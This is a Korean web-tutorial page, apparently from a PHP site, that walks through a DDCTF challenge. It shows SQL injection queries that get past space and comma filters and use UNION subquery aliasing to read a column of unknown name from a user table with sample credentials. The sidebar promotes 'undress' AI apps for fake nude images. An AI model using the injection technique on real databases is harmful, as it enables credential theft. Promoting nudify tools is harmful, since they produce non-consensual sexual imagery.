지역 사회
배우다
도구 라이브러리
AI 도구
여가
찾다
한국어
데이터 베이스 MySQL 튜토리얼 MySQL이 알 수 없는 필드 이름을 우회하는 방법에 대한 자세한 설명

MySQL이 알 수 없는 필드 이름을 우회하는 방법에 대한 자세한 설명

小云云
小云云
Jan 17, 2018 am 10:09 AM
mysql 필드

이 글은 MySQL이 알 수 없는 필드 이름을 교묘하게 우회하는 방법에 대한 관련 정보를 주로 소개합니다. 이 글은 MySQL을 학습하는 데 필요한 참고 자료와 학습 가치를 제공합니다. 우리와 함께 살펴보세요. 모두에게 도움이 되기를 바랍니다.

머리말

이 글에서는 알 수 없는 필드 이름을 우회하는 기술인 DDCTF의 다섯 번째 질문을 소개합니다. 여기서는 이 기계를 사용하여 그 아이디어를 공유하고 싶습니다. 자세한 소개에서:

구현 아이디어

공백은 %0a, %0b, %0c, %0d, %a0을 사용하여 무시할 수 있으며, 쉼표는 조인을 사용하여 직접 무시할 수 있습니다.

플래그를 저장하는 필드 이름을 알 수 없으며 information_schema.columns도 테이블 이름의 16진수를 필터링합니다. 즉, 필드 이름을 얻을 수 없는 경우 공동 쿼리를 사용할 수 있으며 프로세스는 다음과 같습니다.

플래그를 가져와 알려진 필드 이름 아래에 표시하도록 하는 아이디어입니다.

샘플 코드: 

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
+---+-------+----------+-------------+
| 1 | 2  | 3  | 4   |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4   |
+-------------+
| 4   |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4   |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id   | username | password | email  |
+-------------+----------+----------+-------------+
| 1   | admin | admin888 | 110@110.com |
| 120@120.com | 1  | 1  | 1   |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
로그인 후 복사

관련 권장 사항:

MySQL에서 느린 쿼리 로그를 활성화하는 방법에 대한 자세한 설명

Mysql의 기본 문장 최적화 10가지 원칙

Linux 서버의 MySQL 원격 연결 방법에 대한 자세한 설명

위 내용은 MySQL이 알 수 없는 필드 이름을 우회하는 방법에 대한 자세한 설명의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

더보기

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
어 ass 신 크리드 그림자 : 조개 수수께끼 솔루션
1 몇 주 전 By DDD
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
Atomfall에서 크레인 제어 키 카드를 찾을 수 있습니다
1 몇 주 전 By DDD
더보기

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

더보기

뜨거운 주제

Gmail 이메일의 로그인 입구는 어디에 있나요?
7428
15
Cakephp 튜토리얼
1359
52
Steam의 계정 이름 형식은 무엇입니까?
76
11
Win11 활성화 키 영구
27
19
더보기
Related knowledge
MySQL을 설치할 때 누락 된 종속성 문제를 해결하는 방법 MySQL을 설치할 때 누락 된 종속성 문제를 해결하는 방법 Apr 08, 2025 pm 12:00 PM

MySQL 설치 실패는 일반적으로 종속성 부족으로 인해 발생합니다. 솔루션 : 1. 시스템 패키지 관리자 (예 : Linux Apt, YUM 또는 DNF, Windows VisualC 재분배 가능)를 사용하여 Sudoaptinstalllibmysqlclient-dev와 같은 누락 된 종속성 라이브러리를 설치하십시오. 2. 오류 정보를주의 깊게 확인하고 복잡한 종속성을 하나씩 해결하십시오. 3. 패키지 관리자 소스가 올바르게 구성되어 네트워크에 액세스 할 수 있는지 확인하십시오. 4. Windows의 경우 필요한 런타임 라이브러리를 다운로드하여 설치하십시오. 공식 문서를 읽고 검색 엔진을 잘 활용하는 습관을 개발하면 문제를 효과적으로 해결할 수 있습니다.

Laravel 's geospatial : 대화식지도의 최적화 및 많은 양의 데이터 Laravel 's geospatial : 대화식지도의 최적화 및 많은 양의 데이터 Apr 08, 2025 pm 12:24 PM

7 백만 레코드를 효율적으로 처리하고 지리 공간 기술로 대화식지도를 만듭니다. 이 기사는 Laravel과 MySQL을 사용하여 7 백만 개 이상의 레코드를 효율적으로 처리하고 대화식지도 시각화로 변환하는 방법을 살펴 봅니다. 초기 챌린지 프로젝트 요구 사항 : MySQL 데이터베이스에서 7 백만 레코드를 사용하여 귀중한 통찰력을 추출합니다. 많은 사람들이 먼저 프로그래밍 언어를 고려하지만 데이터베이스 자체를 무시합니다. 요구 사항을 충족시킬 수 있습니까? 데이터 마이그레이션 또는 구조 조정이 필요합니까? MySQL이 큰 데이터로드를 견딜 수 있습니까? 예비 분석 : 주요 필터 및 속성을 식별해야합니다. 분석 후, 몇 가지 속성만이 솔루션과 관련이 있음이 밝혀졌습니다. 필터의 타당성을 확인하고 검색을 최적화하기위한 제한 사항을 설정했습니다. 도시를 기반으로 한지도 검색

AWS Blue/Green Deployment를 사용하여 다운 타임이없는 MySQL RDS 데이터베이스 저장 감소 AWS Blue/Green Deployment를 사용하여 다운 타임이없는 MySQL RDS 데이터베이스 저장 감소 Apr 08, 2025 pm 12:42 PM

DevOps 엔지니어는 종종 RDS 데이터베이스 최적화 및 업데이트, 특히 전통적인 방법이 다운 타임 위험이 발생하기 쉬운 높은로드 상황에서 업데이트의 과제에 직면합니다. 이 기사에서는 RDS 데이터베이스의 제로 다운 타임 업데이트를 달성하기 위해 AWS Blue/Green Deployment 전략을 소개합니다. 데이터베이스 업데이트 다운 타임의 악몽에 작별 인사를하십시오! 이 기사는 Blue/Green 배포 전략을 자세히 설명하고 AWS 환경에서 운영 단계를 제공하여 서비스 가용성에 영향을 미치지 않고 RDS 데이터베이스 인스턴스를 업데이트 할 수 있도록합니다. 먼저 준비 팀을 조정하고 업데이트를 위해 작업량 트래픽이 가장 낮은 기간을 선택하십시오. 좋은 DevOps는 팀에 미리 알리는 조언을 연습합니다. 이 예제는 Blue/Green 배포를 사용하여 다운 타임이 0으로 데이터베이스 인스턴스 저장 공간을 줄이는 방법을 보여줍니다. AWSRDS 콘솔을 사용할 수 있습니다

MySQL 설치 후 데이터베이스 성능을 최적화하는 방법 MySQL 설치 후 데이터베이스 성능을 최적화하는 방법 Apr 08, 2025 am 11:36 AM

MySQL 성능 최적화는 설치 구성, 인덱싱 및 쿼리 최적화, 모니터링 및 튜닝의 세 가지 측면에서 시작해야합니다. 1. 설치 후 innodb_buffer_pool_size 매개 변수와 같은 서버 구성에 따라 my.cnf 파일을 조정해야합니다. 2. 과도한 인덱스를 피하기 위해 적절한 색인을 작성하고 Execution 명령을 사용하여 실행 계획을 분석하는 것과 같은 쿼리 문을 최적화합니다. 3. MySQL의 자체 모니터링 도구 (showprocesslist, showstatus)를 사용하여 데이터베이스 건강을 모니터링하고 정기적으로 백업 및 데이터베이스를 구성하십시오. 이러한 단계를 지속적으로 최적화함으로써 MySQL 데이터베이스의 성능을 향상시킬 수 있습니다.

설치 후 MySQL을 사용하는 방법 설치 후 MySQL을 사용하는 방법 Apr 08, 2025 am 11:48 AM

이 기사는 MySQL 데이터베이스의 작동을 소개합니다. 먼저 MySQLworkBench 또는 명령 줄 클라이언트와 같은 MySQL 클라이언트를 설치해야합니다. 1. MySQL-Uroot-P 명령을 사용하여 서버에 연결하고 루트 계정 암호로 로그인하십시오. 2. CreateABase를 사용하여 데이터베이스를 작성하고 데이터베이스를 선택하십시오. 3. CreateTable을 사용하여 테이블을 만들고 필드 및 데이터 유형을 정의하십시오. 4. InsertInto를 사용하여 데이터를 삽입하고 데이터를 쿼리하고 업데이트를 통해 데이터를 업데이트하고 DELETE를 통해 데이터를 삭제하십시오. 이러한 단계를 마스터하고 일반적인 문제를 처리하는 법을 배우고 데이터베이스 성능을 최적화하면 MySQL을 효율적으로 사용할 수 있습니다.

특정 시스템 버전에서 MySQL이보고 한 오류에 대한 솔루션 특정 시스템 버전에서 MySQL이보고 한 오류에 대한 솔루션 Apr 08, 2025 am 11:54 AM

MySQL 설치 오류에 대한 솔루션은 다음과 같습니다. 1. MySQL 종속성 라이브러리 요구 사항이 충족되도록 시스템 환경을주의 깊게 확인하십시오. 다른 운영 체제 및 버전 요구 사항이 다릅니다. 2. 오류 메시지를주의 깊게 읽고 프롬프트 (예 : 라이브러리 파일 누락 또는 부족한 권한)에 따라 종속성 설치 또는 Sudo 명령 사용과 같은 해당 조치를 취합니다. 3. 필요한 경우 소스 코드를 설치하고 컴파일 로그를주의 깊게 확인하십시오. 그러나 일정량의 Linux 지식과 경험이 필요합니다. 궁극적으로 문제를 해결하는 핵심은 시스템 환경 및 오류 정보를 신중하게 확인하고 공식 문서를 참조하는 것입니다.

MySQL 설치 후 데이터베이스의 원격 연결을 구현하는 방법 MySQL 설치 후 데이터베이스의 원격 연결을 구현하는 방법 Apr 08, 2025 am 11:33 AM

MySQL 원격 연결 : MySQL을 설치 한 후 원격 연결 문제에 직면 할 많은 친구들에게 포기 (실수)에 이르기까지. 이 기사는 단순한 "연결 방법"을 가르쳐주지 않지만,이 겉보기에 간단한 문제 뒤에 숨겨져있는 함정과 그것들을 우아하게 해결하고 궁극적으로 "숙달"상태에 도달하는 방법을 심층적으로 탐구합니다 (물론 숙달은 지속적인 학습 과정입니다). 목적 : MySQL 원격 연결의 원칙을 철저히 이해하고 일반적인 트랩에 빠지지 않도록 다양한 시나리오에서 모범 사례를 마스터하겠습니다. 이 기사를 읽은 후에는 다양한 원격 연결 문제를 독립적으로 해결하고 MySQL의 보안 구성에 대해 더 깊이 이해할 수 있습니다. 개요 : MySQL 구성으로 시작합니다.

MySQL 설치 중에 권한이 충분하지 않은 경우해야 할 일 MySQL 설치 중에 권한이 충분하지 않은 경우해야 할 일 Apr 08, 2025 am 11:42 AM

MySQL 설치 권한 문제는 일반적으로 다음과 같은 이유로 인해 발생합니다. 1. 일반 사용자는 Root 또는 Sudo 권한을 사용하여 설치해야합니다. 2. 파일 권한이 부족하면 CHMOD 명령을 사용하여 MySQL 설치 디렉토리 및 데이터 파일 디렉토리의 권한을 수정해야합니다. 3. 3306 포트가 점유되므로 NetStat 명령을 사용하여 포트 점유 서비스를보고 중지하거나 MySQL 구성 파일을 수정해야합니다. 4. SELINUX 또는 APPARMOR 보안 메커니즘 제한을 제한하면 일시적으로 비활성화하거나 올바르게 구성 할 수 있습니다. 안전하고 안정적인 시스템 환경을 구축하기 위해 Sudo를 사용하여 문제를 우회하는 것이 아니라 권한 관리 메커니즘을 이해해야합니다.

See all articles